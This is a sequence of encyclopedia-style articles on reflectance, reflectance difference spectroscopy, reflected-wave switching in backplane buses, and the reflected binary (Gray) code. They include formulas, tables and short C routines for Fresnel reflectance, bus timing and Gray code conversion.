The reflectance of the surface of a material is its effectiveness in reflecting radiant energy . It is the fraction of incident electromagnetic power that is reflected at the boundary. Reflectance is a component of the response of the electronic structure of the material to the electromagnetic field of light, and is in general a function of the frequency, or wavelength , of the light, its polarization, and the angle of incidence . The dependence of reflectance on the wavelength is called a reflectance spectrum or spectral reflectance curve .
The hemispherical reflectance of a surface, denoted R , is defined as [ 1 ]
$$R = \frac{\Phi_\mathrm{e}^\mathrm{r}}{\Phi_\mathrm{e}^\mathrm{i}},$$
where $\Phi_\mathrm{e}^\mathrm{r}$ is the radiant flux reflected by that surface and $\Phi_\mathrm{e}^\mathrm{i}$ is the radiant flux received by that surface.
The spectral hemispherical reflectance in frequency and spectral hemispherical reflectance in wavelength of a surface, denoted R ν and R λ respectively, are defined as [ 1 ]
$$R_\nu = \frac{\Phi_{\mathrm{e},\nu}^\mathrm{r}}{\Phi_{\mathrm{e},\nu}^\mathrm{i}}, \qquad R_\lambda = \frac{\Phi_{\mathrm{e},\lambda}^\mathrm{r}}{\Phi_{\mathrm{e},\lambda}^\mathrm{i}},$$
where $\Phi_{\mathrm{e},\nu}^\mathrm{r}$ and $\Phi_{\mathrm{e},\nu}^\mathrm{i}$ are the spectral radiant flux in frequency reflected and received by that surface, and $\Phi_{\mathrm{e},\lambda}^\mathrm{r}$ and $\Phi_{\mathrm{e},\lambda}^\mathrm{i}$ are the spectral radiant flux in wavelength reflected and received by that surface.
The directional reflectance of a surface, denoted R Ω , is defined as [ 1 ]
$$R_\Omega = \frac{L_{\mathrm{e},\Omega}^\mathrm{r}}{L_{\mathrm{e},\Omega}^\mathrm{i}},$$
where $L_{\mathrm{e},\Omega}^\mathrm{r}$ is the radiance reflected by that surface and $L_{\mathrm{e},\Omega}^\mathrm{i}$ is the radiance received by that surface.
This depends on both the reflected direction and the incoming direction. In other words, it has a value for every combination of incoming and outgoing directions. It is related to the bidirectional reflectance distribution function and its upper limit is 1. Another measure of reflectance, depending only on the outgoing direction, is I / F , where I is the radiance reflected in a given direction and F is the incoming radiance averaged over all directions, in other words, the total flux of radiation hitting the surface per unit area, divided by π. [ 2 ] This can be greater than 1 for a glossy surface illuminated by a source such as the sun, with the reflectance measured in the direction of maximum radiance (see also Seeliger effect ).
The spectral directional reflectance in frequency and spectral directional reflectance in wavelength of a surface, denoted R Ω, ν and R Ω, λ respectively, are defined as [ 1 ]
$$R_{\Omega,\nu} = \frac{L_{\mathrm{e},\Omega,\nu}^\mathrm{r}}{L_{\mathrm{e},\Omega,\nu}^\mathrm{i}}, \qquad R_{\Omega,\lambda} = \frac{L_{\mathrm{e},\Omega,\lambda}^\mathrm{r}}{L_{\mathrm{e},\Omega,\lambda}^\mathrm{i}},$$
where $L_{\mathrm{e},\Omega,\nu}^\mathrm{r}$ and $L_{\mathrm{e},\Omega,\nu}^\mathrm{i}$ are the spectral radiance in frequency reflected and received by that surface, and $L_{\mathrm{e},\Omega,\lambda}^\mathrm{r}$ and $L_{\mathrm{e},\Omega,\lambda}^\mathrm{i}$ are the corresponding spectral radiances in wavelength.
Again, one can also define a value of I / F (see above) for a given wavelength. [ 3 ]
For homogeneous and semi-infinite (see halfspace ) materials, reflectivity is the same as reflectance.
Reflectivity is the square of the magnitude of the Fresnel reflection coefficient , [ 4 ] which is the ratio of the reflected to incident electric field ; [ 5 ] as such the reflection coefficient can be expressed as a complex number as determined by the Fresnel equations for a single layer, whereas the reflectance is always a positive real number .
For layered and finite media, according to the CIE , [ citation needed ] reflectivity is distinguished from reflectance by the fact that reflectivity is a value that applies to thick reflecting objects. [ 6 ] When reflection occurs from thin layers of material, internal reflection effects can cause the reflectance to vary with surface thickness. Reflectivity is the limit value of reflectance as the sample becomes thick; it is the intrinsic reflectance of the surface, hence irrespective of other parameters such as the reflectance of the rear surface. Another way to interpret this is that the reflectance is the fraction of electromagnetic power reflected from a specific sample, while reflectivity is a property of the material itself, which would be measured on a perfect machine if the material filled half of all space. [ 7 ]
Given that reflectance is a directional property, most surfaces can be divided into those that give specular reflection and those that give diffuse reflection .
For specular surfaces, such as glass or polished metal, reflectance is nearly zero at all angles except at the appropriate reflected angle; that is the same angle with respect to the surface normal in the plane of incidence , but on the opposing side. When the radiation is incident normal to the surface, it is reflected back into the same direction.
For diffuse surfaces, such as matte white paint, reflectance is uniform; radiation is reflected in all angles equally or near-equally. Such surfaces are said to be Lambertian .
Most practical objects exhibit a combination of diffuse and specular reflective properties.
Reflection occurs when light moves from a medium with one index of refraction into a second medium with a different index of refraction.
Specular reflection from a body of water is calculated by the Fresnel equations . [ 8 ] Fresnel reflection is directional and therefore does not contribute significantly to albedo , which is primarily due to diffuse reflection.
A real water surface may be wavy. Reflectance, which assumes a flat surface as given by the Fresnel equations , can be adjusted to account for waviness .
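As an illustration of the flat-surface case, the Fresnel equations can be evaluated directly. The sketch below is only an example calculation: the refractive indices (air and a nominal value for water) and the angle of incidence are assumed inputs, and a real, wavy surface deviates from this idealization.

#include <stdio.h>
#include <math.h>

int main(void)
{
    const double PI = 3.14159265358979323846;
    double n1 = 1.000;                     /* air */
    double n2 = 1.333;                     /* water, approximate value for visible light */
    double theta_i = 60.0 * PI / 180.0;    /* example angle of incidence */

    /* Snell's law gives the refraction angle. */
    double theta_t = asin(n1 / n2 * sin(theta_i));

    /* Fresnel amplitude reflection coefficients for s- and p-polarization. */
    double rs = (n1 * cos(theta_i) - n2 * cos(theta_t)) /
                (n1 * cos(theta_i) + n2 * cos(theta_t));
    double rp = (n1 * cos(theta_t) - n2 * cos(theta_i)) /
                (n1 * cos(theta_t) + n2 * cos(theta_i));

    /* Reflectance is the squared magnitude; average the two for unpolarized light. */
    double Rs = rs * rs, Rp = rp * rp;
    printf("Rs = %.4f, Rp = %.4f, unpolarized R = %.4f\n", Rs, Rp, 0.5 * (Rs + Rp));
    return 0;
}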
The generalization of reflectance to a diffraction grating , which disperses light by wavelength , is called diffraction efficiency . | https://en.wikipedia.org/wiki/Reflectance |
Reflectance difference spectroscopy (RDS) is a spectroscopic technique which measures the difference in reflectance between two beams of light that are shone at normal incidence on a surface with different linear polarizations . [ 1 ] It is also known as reflectance anisotropy spectroscopy (RAS). [ 2 ]
It is calculated as the normalized difference
$$\frac{\Delta r}{r} = 2\,\frac{r_\alpha - r_\beta}{r_\alpha + r_\beta},$$
where $r_\alpha$ and $r_\beta$ are the reflectances in the two different polarizations.
The method was introduced in 1985 for the study of the optical properties of the cubic semiconductors silicon and germanium . [ 3 ] Due to its high surface sensitivity and independence from ultra-high vacuum , its use has been expanded to in situ monitoring of epitaxial growth [ 4 ] or the interaction of surfaces with adsorbates. [ 5 ] To assign specific features in the signal to their origin in morphology and electronic structure, theoretical modelling by density functional theory is required.
| https://en.wikipedia.org/wiki/Reflectance_difference_spectroscopy |
Reflected-wave switching [ 1 ] is a signalling technique used in backplane computer buses such as PCI .
A backplane computer bus is a type of multilayer printed circuit board that has at least one (almost) solid layer of copper called the ground plane, and at least one layer of copper tracks that are used as wires for the signals. Each signal travels along a transmission line formed by its track and the narrow strip of ground plane directly beneath it. This structure is known in radio engineering as microstrip line.
Each signal travels from a transmitter to one or more receivers. Most computer buses use binary digital signals, which are sequences of pulses of fixed amplitude. In order to receive the correct data, the receiver must detect each pulse once, and only once. To ensure this, the designer must take the high-frequency characteristics of the microstrip into account.
When a pulse is launched into the microstrip by the transmitter, its amplitude depends on the ratio of the impedances of the transmitter and the microstrip. The impedance of the transmitter is simply its output resistance . The impedance of the microstrip is its characteristic impedance , which depends on its dimensions and on the materials used in the backplane's construction. As the leading edge of the pulse (the incident wave ) passes the receiver, it may or may not have sufficient amplitude to be detected. If it does, then the system is said to use incident-wave switching . This is the system used in most computer buses predating PCI, such as the VME bus.
When the pulse reaches the end of the microstrip, its behaviour depends on the circuit conditions at this point. If the microstrip is correctly terminated (usually with a combination of resistors ), the pulse is absorbed and its energy is converted to heat . This is the case in an incident-wave switching bus. If, on the other hand, there is no termination at the end of the microstrip, and the pulse encounters an open circuit, it is reflected back towards its source. As this reflected wave travels back along the microstrip, its amplitude is added to that of the original pulse. As the reflected wave passes the receiver for a second time, this time from the opposite direction, it now has enough amplitude to be detected. This is what happens in a reflected-wave switching bus.
In incident-wave switching buses, reflections from the end of the bus are undesirable and must be prevented by adding termination. Terminating an incident-wave trace varies in complexity from a DC-balanced, AC-coupled termination to a single resistor series terminator, but all incident wave terminations consume both power and space (Johnson and Graham, 1993). However, incident-wave switching buses can be significantly longer than reflected-wave switching buses operating at the same frequency.
If the limited bus length is acceptable, a reflected-wave switching bus will use less power, and fewer components to operate at a given frequency. The bus has to be short enough, such that a pulse may travel twice the length of the backplane (one complete journey for the incident wave, and another for the reflected wave), and stabilize sufficiently to be read in a single bus cycle. The travel time can be calculated by dividing the round-trip length of the bus by the speed of propagation of the signal (which is roughly one half to two-thirds of c , the speed of light in vacuum). | https://en.wikipedia.org/wiki/Reflected-wave_switching |
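As a rough illustration of this timing constraint, the round-trip time can be computed directly. The board length, propagation speed, and cycle time below are assumed example values, not figures from the PCI specification.

#include <stdio.h>

int main(void)
{
    /* Assumed example values -- not taken from any specification. */
    const double bus_length_m   = 0.30;    /* physical length of the backplane trace */
    const double c              = 3.0e8;   /* speed of light in vacuum, m/s */
    const double velocity       = 0.6 * c; /* assumed propagation speed in the microstrip */
    const double clock_period_s = 30e-9;   /* example bus cycle time (~33 MHz) */

    /* Reflected-wave switching needs the pulse to traverse the bus twice
       (incident wave out, reflected wave back) within one bus cycle. */
    double round_trip_s = 2.0 * bus_length_m / velocity;

    printf("Round-trip time: %.2f ns\n", round_trip_s * 1e9);
    printf("Fits in one bus cycle: %s\n",
           round_trip_s < clock_period_s ? "yes" : "no");
    return 0;
}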
The reflected binary code ( RBC ), also known as reflected binary ( RB ) or Gray code after Frank Gray , is an ordering of the binary numeral system such that two successive values differ in only one bit (binary digit).
For example, the representation of the decimal value "1" in binary would normally be " 001 ", and "2" would be " 010 ". In Gray code, these values are represented as " 001 " and " 011 ". That way, incrementing a value from 1 to 2 requires only one bit to change, instead of two.
Gray codes are widely used to prevent spurious output from electromechanical switches and to facilitate error correction in digital communications such as digital terrestrial television and some cable TV systems. The use of Gray code in these devices helps simplify logic operations and reduce errors in practice. [ 3 ]
Many devices indicate position by closing and opening switches. If that device uses natural binary codes , positions 3 and 4 are next to each other but all three bits of the binary representation differ: 011 for position 3 versus 100 for position 4.
The problem with natural binary codes is that physical switches are not ideal: it is very unlikely that physical switches will change states exactly in synchrony. In the transition between the two states shown above, all three switches change state. In the brief period while all are changing, the switches will read some spurious position. Even without keybounce , the transition might look like 011 — 001 — 101 — 100 . When the switches appear to be in position 001 , the observer cannot tell if that is the "real" position 1, or a transitional state between two other positions. If the output feeds into a sequential system, possibly via combinational logic , then the sequential system may store a false value.
This problem can be solved by changing only one switch at a time, so there is never any ambiguity of position, resulting in codes assigning to each of a contiguous set of integers , or to each member of a circular list, a word of symbols such that no two code words are identical and each two adjacent code words differ by exactly one symbol. These codes are also known as unit-distance , [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] single-distance , single-step , monostrophic [ 9 ] [ 10 ] [ 7 ] [ 8 ] or syncopic codes , [ 9 ] in reference to the Hamming distance of 1 between adjacent codes.
In principle, there can be more than one such code for a given word length, but the term Gray code was first applied to a particular binary code for non-negative integers, the binary-reflected Gray code , or BRGC . Bell Labs researcher George R. Stibitz described such a code in a 1941 patent application, granted in 1943. [ 11 ] [ 12 ] [ 13 ] Frank Gray introduced the term reflected binary code in his 1947 patent application, remarking that the code had "as yet no recognized name". [ 14 ] He derived the name from the fact that it "may be built up from the conventional binary code by a sort of reflection process".
In the standard encoding of the Gray code the least significant bit follows a repetitive pattern of 2 on, 2 off ( ... 11001100 ... ); the next digit a pattern of 4 on, 4 off; the $i$-th least significant bit a pattern of $2^i$ on, $2^i$ off. The most significant digit is an exception to this: for an n -bit Gray code, the most significant digit follows the pattern $2^{n-1}$ on, $2^{n-1}$ off, which is the same (cyclic) sequence of values as for the second-most significant digit, but shifted forwards $2^{n-2}$ places. The four-bit version of this is shown below:
Decimal  Binary  Gray
 0       0000    0000
 1       0001    0001
 2       0010    0011
 3       0011    0010
 4       0100    0110
 5       0101    0111
 6       0110    0101
 7       0111    0100
 8       1000    1100
 9       1001    1101
10       1010    1111
11       1011    1110
12       1100    1010
13       1101    1011
14       1110    1001
15       1111    1000
For decimal 15 the code rolls over to decimal 0 with only one switch change. This is called the cyclic or adjacency property of the code. [ 15 ]
Despite the fact that Stibitz described this code [ 11 ] [ 12 ] [ 13 ] before Gray, the reflected binary code was later named after Gray by others who used it. Two different 1953 patent applications use "Gray code" as an alternative name for the "reflected binary code"; [ 16 ] [ 17 ] one of those also lists "minimum error code" and "cyclic permutation code" among the names. [ 17 ] A 1954 patent application refers to "the Bell Telephone Gray code". [ 18 ] Other names include "cyclic binary code", [ 12 ] "cyclic progression code", [ 19 ] [ 12 ] "cyclic permuting binary" [ 20 ] or "cyclic permuted binary" (CPB). [ 21 ] [ 22 ]
The Gray code is sometimes misattributed to 19th century electrical device inventor Elisha Gray . [ 13 ] [ 23 ] [ 24 ] [ 25 ]
Reflected binary codes were applied to mathematical puzzles before they became known to engineers.
The binary-reflected Gray code represents the underlying scheme of the classical Chinese rings puzzle , a sequential mechanical puzzle mechanism described by the Frenchman Louis Gros in 1872. [ 26 ] [ 13 ]
It can serve as a solution guide for the Towers of Hanoi problem, based on a game by the French mathematician Édouard Lucas in 1883. [ 27 ] [ 28 ] [ 29 ] [ 30 ] Similarly, the so-called Towers of Bucharest and Towers of Klagenfurt game configurations yield ternary and pentary Gray codes. [ 31 ]
Martin Gardner wrote a popular account of the Gray code in his August 1972 "Mathematical Games" column in Scientific American . [ 32 ]
The code also forms a Hamiltonian cycle on a hypercube , where each bit is seen as one dimension.
When the French engineer Émile Baudot changed from using a 6-unit (6-bit) code to 5-unit code for his printing telegraph system, in 1875 [ 33 ] or 1876, [ 34 ] [ 35 ] he ordered the alphabetic characters on his print wheel using a reflected binary code, and assigned the codes using only three of the bits to vowels. With vowels and consonants sorted in their alphabetical order, [ 36 ] [ 37 ] [ 38 ] and other symbols appropriately placed, the 5-bit character code has been recognized as a reflected binary code. [ 13 ] This code became known as Baudot code [ 39 ] and, with minor changes, was eventually adopted as International Telegraph Alphabet No. 1 (ITA1, CCITT-1) in 1932. [ 40 ] [ 41 ] [ 38 ]
About the same time, the German-Austrian Otto Schäffler [ de ] [ 42 ] demonstrated another printing telegraph in Vienna using a 5-bit reflected binary code for the same purpose, in 1874. [ 43 ] [ 13 ]
Frank Gray , who became famous for inventing the signaling method that came to be used for compatible color television, invented a method to convert analog signals to reflected binary code groups using vacuum tube -based apparatus. Filed in 1947, the method and apparatus were granted a patent in 1953, [ 14 ] and the name of Gray stuck to the codes. The " PCM tube " apparatus that Gray patented was made by Raymond W. Sears of Bell Labs, working with Gray and William M. Goodall, who credited Gray for the idea of the reflected binary code. [ 44 ]
Gray was most interested in using the codes to minimize errors in converting analog signals to digital; his codes are still used today for this purpose.
Gray codes are used in linear and rotary position encoders ( absolute encoders and quadrature encoders ) in preference to weighted binary encoding. This avoids the possibility that, when multiple bits change in the binary representation of a position, a misread will result from some of the bits changing before others.
For example, some rotary encoders provide a disk which has an electrically conductive Gray code pattern on concentric rings (tracks). Each track has a stationary metal spring contact that provides electrical contact to the conductive code pattern. Together, these contacts produce output signals in the form of a Gray code. Other encoders employ non-contact mechanisms based on optical or magnetic sensors to produce the Gray code output signals.
Regardless of the mechanism or precision of a moving encoder, position measurement error can occur at specific positions (at code boundaries) because the code may be changing at the exact moment it is read (sampled). A binary output code could cause significant position measurement errors because it is impossible to make all bits change at exactly the same time. If, at the moment the position is sampled, some bits have changed and others have not, the sampled position will be incorrect. In the case of absolute encoders, the indicated position may be far away from the actual position and, in the case of incremental encoders, this can corrupt position tracking.
In contrast, the Gray code used by position encoders ensures that the codes for any two consecutive positions will differ by only one bit and, consequently, only one bit can change at a time. In this case, the maximum position error will be small, indicating a position adjacent to the actual position.
Due to the Hamming distance properties of Gray codes, they are sometimes used in genetic algorithms . [ 15 ] They are very useful in this field, since mutations in the code allow for mostly incremental changes, but occasionally a single bit-change can cause a big leap and lead to new properties.
Gray codes are also used in labelling the axes of Karnaugh maps since 1953 [ 45 ] [ 46 ] [ 47 ] as well as in Händler circle graphs since 1958, [ 48 ] [ 49 ] [ 50 ] [ 51 ] both graphical methods for logic circuit minimization .
In modern digital communications , 1D- and 2D-Gray codes play an important role in error prevention before applying an error correction . For example, in a digital modulation scheme such as QAM where data is typically transmitted in symbols of 4 bits or more, the signal's constellation diagram is arranged so that the bit patterns conveyed by adjacent constellation points differ by only one bit. By combining this with forward error correction capable of correcting single-bit errors, it is possible for a receiver to correct any transmission errors that cause a constellation point to deviate into the area of an adjacent point. This makes the transmission system less susceptible to noise .
Digital logic designers use Gray codes extensively for passing multi-bit count information between synchronous logic that operates at different clock frequencies. The logic is considered operating in different "clock domains". It is fundamental to the design of large chips that operate with many different clocking frequencies.
If a system has to cycle sequentially through all possible combinations of on-off states of some set of controls, and the changes of the controls require non-trivial expense (e.g. time, wear, human work), a Gray code minimizes the number of setting changes to just one change for each combination of states. An example would be testing a piping system for all combinations of settings of its manually operated valves.
A balanced Gray code can be constructed [ 52 ] that flips every bit equally often. Since bit-flips are evenly distributed, this is optimal in the following way: balanced Gray codes minimize the maximal count of bit-flips for each digit.
George R. Stibitz utilized a reflected binary code in a binary pulse counting device as early as 1941. [ 11 ] [ 12 ] [ 13 ]
A typical use of Gray code counters is building a FIFO (first-in, first-out) data buffer that has read and write ports that exist in different clock domains. The input and output counters inside such a dual-port FIFO are often stored using Gray code to prevent invalid transient states from being captured when the count crosses clock domains. [ 53 ] The updated read and write pointers need to be passed between clock domains when they change, to be able to track FIFO empty and full status in each domain. Each bit of the pointers is sampled non-deterministically for this clock domain transfer. So for each bit, either the old value or the new value is propagated. Therefore, if more than one bit in the multi-bit pointer is changing at the sampling point, a "wrong" binary value (neither new nor old) can be propagated. By guaranteeing only one bit can be changing, Gray codes guarantee that the only possible sampled values are the new or old multi-bit value. Typically Gray codes of power-of-two length are used.
Sometimes digital buses in electronic systems are used to convey quantities that can only increase or decrease by one at a time, for example the output of an event counter which is being passed between clock domains or to a digital-to-analog converter. The advantage of Gray codes in these applications is that differences in the propagation delays of the many wires that represent the bits of the code cannot cause the received value to go through states that are out of the Gray code sequence. This is similar to the advantage of Gray codes in the construction of mechanical encoders, however the source of the Gray code is an electronic counter in this case. The counter itself must count in Gray code, or if the counter runs in binary then the output value from the counter must be reclocked after it has been converted to Gray code, because when a value is converted from binary to Gray code, [ nb 1 ] it is possible that differences in the arrival times of the binary data bits into the binary-to-Gray conversion circuit will mean that the code could go briefly through states that are wildly out of sequence. Adding a clocked register after the circuit that converts the count value to Gray code may introduce a clock cycle of latency, so counting directly in Gray code may be advantageous. [ 54 ]
To produce the next count value in a Gray-code counter, it is necessary to have some combinational logic that will increment the current count value that is stored. One way to increment a Gray code number is to convert it into ordinary binary code, [ 55 ] add one to it with a standard binary adder, and then convert the result back to Gray code. [ 56 ] Other methods of counting in Gray code are discussed in a report by Robert W. Doran , including taking the output from the first latches of the master-slave flip flops in a binary ripple counter. [ 57 ]
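A minimal sketch of that decode–increment–re-encode approach follows (a straightforward reading of the method just described, not an optimized hardware counter; the function names are illustrative):

#include <stdint.h>
#include <stdio.h>

static uint32_t gray_encode(uint32_t n) { return n ^ (n >> 1); }

static uint32_t gray_decode(uint32_t g)
{
    /* XOR the shifted copies of the original value together to undo the encoding. */
    for (uint32_t mask = g >> 1; mask != 0; mask >>= 1)
        g ^= mask;
    return g;
}

/* Next value of a Gray-code counter: decode, add one, re-encode. */
static uint32_t gray_next(uint32_t g) { return gray_encode(gray_decode(g) + 1); }

int main(void)
{
    uint32_t g = 0;
    for (int i = 0; i < 8; i++) {   /* prints 0 1 3 2 6 7 5 4 */
        printf("%u ", g);
        g = gray_next(g);
    }
    printf("\n");
    return 0;
}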
As the execution of program code typically causes an instruction memory access pattern of locally consecutive addresses, bus encodings using Gray code addressing instead of binary addressing can reduce the number of state changes of the address bits significantly, thereby reducing the CPU power consumption in some low-power designs. [ 58 ] [ 59 ]
The binary-reflected Gray code list for n bits can be generated recursively from the list for n − 1 bits by reflecting the list (i.e. listing the entries in reverse order), prefixing the entries in the original list with a binary 0 , prefixing the entries in the reflected list with a binary 1 , and then concatenating the original list with the reversed list. [ 13 ] For example, generating the n = 3 list from the n = 2 list:
2-bit list:                00, 01, 11, 10
Reflected:                 10, 11, 01, 00
Prefix original with 0:    000, 001, 011, 010
Prefix reflected with 1:   110, 111, 101, 100
Concatenated 3-bit list:   000, 001, 011, 010, 110, 111, 101, 100
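A sketch of that reflect-and-prefix construction in code (the fixed maximum width and the helper names are illustrative, not part of any standard API):

#include <stdio.h>
#include <string.h>

#define MAX_BITS 8
#define MAX_CODES (1 << MAX_BITS)

/* Build the n-bit binary-reflected Gray code list by the reflect-and-prefix rule. */
static void brgc(int n, char codes[][MAX_BITS + 1], int *count)
{
    if (n == 0) {                 /* zero-bit code: a single empty word */
        codes[0][0] = '\0';
        *count = 1;
        return;
    }
    brgc(n - 1, codes, count);    /* list for n - 1 bits */
    int half = *count;
    for (int i = 0; i < half; i++) {
        /* reflected half, prefixed with '1' */
        char tmp[MAX_BITS + 1];
        snprintf(tmp, sizeof tmp, "1%s", codes[half - 1 - i]);
        strcpy(codes[half + i], tmp);
    }
    for (int i = 0; i < half; i++) {
        /* original half, prefixed with '0' */
        char tmp[MAX_BITS + 1];
        snprintf(tmp, sizeof tmp, "0%s", codes[i]);
        strcpy(codes[i], tmp);
    }
    *count = 2 * half;
}

int main(void)
{
    char codes[MAX_CODES][MAX_BITS + 1];
    int count = 0;
    brgc(3, codes, &count);
    for (int i = 0; i < count; i++)
        printf("%s\n", codes[i]);   /* 000 001 011 010 110 111 101 100 */
    return 0;
}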
The one-bit Gray code is G 1 = ( 0, 1 ). This can be thought of as built recursively as above from a zero-bit Gray code G 0 = ( Λ ) consisting of a single entry of zero length. This iterative process of generating G n +1 from G n makes several properties of the standard reflecting code clear; for example, G n is a permutation of the numbers 0, ..., 2 n − 1, and its entries, each prefixed with a 0, form the first half of G n +1 .
These characteristics suggest a simple and fast method of translating a binary value into the corresponding Gray code. Each bit is inverted if the next higher bit of the input value is set to one. This can be performed in parallel by a bit-shift and exclusive-or operation if they are available: the $n$th Gray code is obtained by computing $n \oplus \lfloor n/2 \rfloor$. Prepending a 0 bit leaves the order of the code words unchanged, prepending a 1 bit reverses the order of the code words. If the bits at position $i$ of codewords are inverted, the order of neighbouring blocks of $2^i$ codewords is reversed. For example, if bit 0 is inverted in a 3 bit codeword sequence, the order of two neighbouring codewords is reversed:
000, 001, 011, 010, 110, 111, 101, 100 → 001, 000, 010, 011, 111, 110, 100, 101
If bit 1 is inverted, blocks of 2 codewords change order:
000, 001, 011, 010, 110, 111, 101, 100 → 010, 011, 001, 000, 100, 101, 111, 110
If bit 2 is inverted, blocks of 4 codewords reverse order:
000, 001, 011, 010, 110, 111, 101, 100 → 100, 101, 111, 110, 010, 011, 001, 000
Thus, performing an exclusive or on a bit $b_i$ at position $i$ with the bit $b_{i+1}$ at position $i+1$ leaves the order of codewords intact if $b_{i+1} = 0$, and reverses the order of blocks of $2^{i+1}$ codewords if $b_{i+1} = 1$. Now, this is exactly the same operation as the reflect-and-prefix method to generate the Gray code.
A similar method can be used to perform the reverse translation, but the computation of each bit depends on the computed value of the next higher bit so it cannot be performed in parallel. Assuming $g_i$ is the $i$th Gray-coded bit ($g_0$ being the most significant bit), and $b_i$ is the $i$th binary-coded bit ($b_0$ being the most significant bit), the reverse translation can be given recursively: $b_0 = g_0$, and $b_i = g_i \oplus b_{i-1}$. Alternatively, decoding a Gray code into a binary number can be described as a prefix sum of the bits in the Gray code, where each individual summation operation in the prefix sum is performed modulo two.
To construct the binary-reflected Gray code iteratively, at step 0 start with the code $\mathrm{code}_0 = 0$, and at step $i > 0$ find the bit position of the least significant 1 in the binary representation of $i$ and flip the bit at that position in the previous code $\mathrm{code}_{i-1}$ to get the next code $\mathrm{code}_i$. The bit positions start 0, 1, 0, 2, 0, 1, 0, 3, ... [ nb 2 ] See find first set for efficient algorithms to compute these values.
The following functions in C convert between binary numbers and their associated Gray codes. While it may seem that Gray-to-binary conversion requires each bit to be handled one at a time, faster algorithms exist. [ 60 ] [ 55 ] [ nb 1 ]
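The original listing is not reproduced above, so the functions below are a reconstruction of the usual conversion routines rather than the article's exact code; the last one is a logarithmic-step variant in the spirit of the faster algorithms the paragraph mentions (not necessarily the cited ones).

#include <stdint.h>

uint32_t binary_to_gray(uint32_t num)
{
    return num ^ (num >> 1);
}

/* Straightforward Gray-to-binary conversion: each binary bit is the XOR of
   all higher-order Gray bits. */
uint32_t gray_to_binary(uint32_t num)
{
    uint32_t mask = num;
    while (mask) {
        mask >>= 1;
        num ^= mask;
    }
    return num;
}

/* A faster variant for 32-bit values using a logarithmic number of XORs. */
uint32_t gray_to_binary32(uint32_t num)
{
    num ^= num >> 16;
    num ^= num >> 8;
    num ^= num >> 4;
    num ^= num >> 2;
    num ^= num >> 1;
    return num;
}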
On newer processors, the number of ALU instructions in the decoding step can be reduced by taking advantage of the CLMUL instruction set . If MASK is the constant binary string of ones ended with a single zero digit, then carryless multiplication of MASK with the Gray encoding of x will always give either x or its bitwise negation.
In practice, "Gray code" almost always refers to a binary-reflected Gray code (BRGC). However, mathematicians have discovered other kinds of Gray codes. Like BRGCs, each consists of a list of words, where each word differs from the next in only one digit (each word has a Hamming distance of 1 from the next word).
It is possible to construct binary Gray codes with n bits with a length of less than 2 n , if the length is even. One possibility is to start with a balanced Gray code and remove pairs of values at either the beginning and the end, or in the middle. [ 61 ] OEIS sequence A290772 [ 62 ] gives the number of possible Gray sequences of length 2 n that include zero and use the minimum number of bits.
A three-digit reflected ternary Gray code, listed against ordinary ternary counting:
  0 → 000    1 → 001    2 → 002
 10 → 012   11 → 011   12 → 010
 20 → 020   21 → 021   22 → 022
100 → 122  101 → 121  102 → 120
110 → 110  111 → 111  112 → 112
120 → 102  121 → 101  122 → 100
200 → 200  201 → 201  202 → 202
210 → 212  211 → 211  212 → 210
220 → 220  221 → 221  222 → 222
There are many specialized types of Gray codes other than the binary-reflected Gray code. One such type of Gray code is the n -ary Gray code , also known as a non-Boolean Gray code . As the name implies, this type of Gray code uses non- Boolean values in its encodings.
For example, a 3-ary ( ternary ) Gray code would use the values 0, 1, 2. [ 31 ] The ( n , k )- Gray code is the n -ary Gray code with k digits. [ 63 ] The sequence of elements in the (3, 2)-Gray code is: 00, 01, 02, 12, 11, 10, 20, 21, 22. The ( n , k )-Gray code may be constructed recursively, as the BRGC, or may be constructed iteratively . An algorithm to iteratively generate the ( n , k )-Gray code is presented (in C ):
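The listing itself does not survive in this extract, so the following is a reconstruction of a modular-arithmetic routine of the kind the paragraph refers to. Note that, as discussed in the next paragraph, it yields a cyclic code in which a digit may change by wrapping, so its output order differs from the reflected (3, 2) sequence listed above. Function and variable names are illustrative.

#include <stdio.h>

/* Convert `value` to its (base, digits)-Gray code representation.
   gray[0] receives the least significant digit; digits must be <= 32. */
void to_nary_gray(unsigned base, unsigned digits, unsigned value, unsigned gray[])
{
    unsigned base_n[32];          /* plain base-n digits of value, least significant first */
    for (unsigned i = 0; i < digits; i++) {
        base_n[i] = value % base;
        value /= base;
    }

    unsigned shift = 0;           /* running correction carried down from higher digits */
    for (int i = (int)digits - 1; i >= 0; i--) {
        gray[i] = (base_n[i] + shift) % base;
        shift += base - gray[i];  /* subtract from base so shift stays non-negative */
    }
}

int main(void)
{
    unsigned gray[2];
    for (unsigned v = 0; v < 9; v++) {        /* a cyclic (3, 2) sequence */
        to_nary_gray(3, 2, v, gray);
        printf("%u%u\n", gray[1], gray[0]);   /* prints 00 01 02 12 10 11 21 22 20 */
    }
    return 0;
}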
There are other Gray code algorithms for ( n , k )-Gray codes. The ( n , k )-Gray code produced by the above algorithm is always cyclical; some algorithms, such as that by Guan, [ 63 ] lack this property when k is odd. On the other hand, while only one digit at a time changes with this method, it can change by wrapping (looping from n − 1 to 0). In Guan's algorithm, the count alternately rises and falls, so that the numeric difference between two Gray code digits is always one.
Gray codes are not uniquely defined, because a permutation of the columns of such a code is a Gray code too. The above procedure produces a code in which the lower the significance of a digit, the more often it changes, making it similar to normal counting methods.
See also Skew binary number system , a variant ternary number system where at most two digits change on each increment, as each increment can be done with at most one digit carry operation.
Although the binary reflected Gray code is useful in many scenarios, it is not optimal in certain cases because of a lack of "uniformity". [ 52 ] In balanced Gray codes , the numbers of changes in the different coordinate positions are as close to one another as possible. To make this more precise, let G be an R -ary complete Gray cycle having transition sequence $(\delta_k)$; the transition counts ( spectrum ) of G are the collection of integers defined by
$$\lambda_k = \left|\left\{ j \in \mathbb{Z}_{R^n} : \delta_j = k \right\}\right|, \quad \text{for } k \in \mathbb{Z}_n.$$
A Gray code is uniform or uniformly balanced if its transition counts are all equal, in which case we have $\lambda_k = \tfrac{R^n}{n}$ for all k . Clearly, when $R = 2$, such codes exist only if n is a power of 2. [ 64 ] If n is not a power of 2, it is possible to construct well-balanced binary codes where the difference between two transition counts is at most 2; so that (combining both cases) every transition count is either $2\left\lfloor \tfrac{2^n}{2n} \right\rfloor$ or $2\left\lceil \tfrac{2^n}{2n} \right\rceil$. [ 52 ] Gray codes can also be exponentially balanced if all of their transition counts are adjacent powers of two, and such codes exist for every power of two. [ 65 ]
For example, a balanced 4-bit Gray code has 16 transitions, which can be evenly distributed among all four positions (four transitions per position), making it uniformly balanced: [ 52 ]
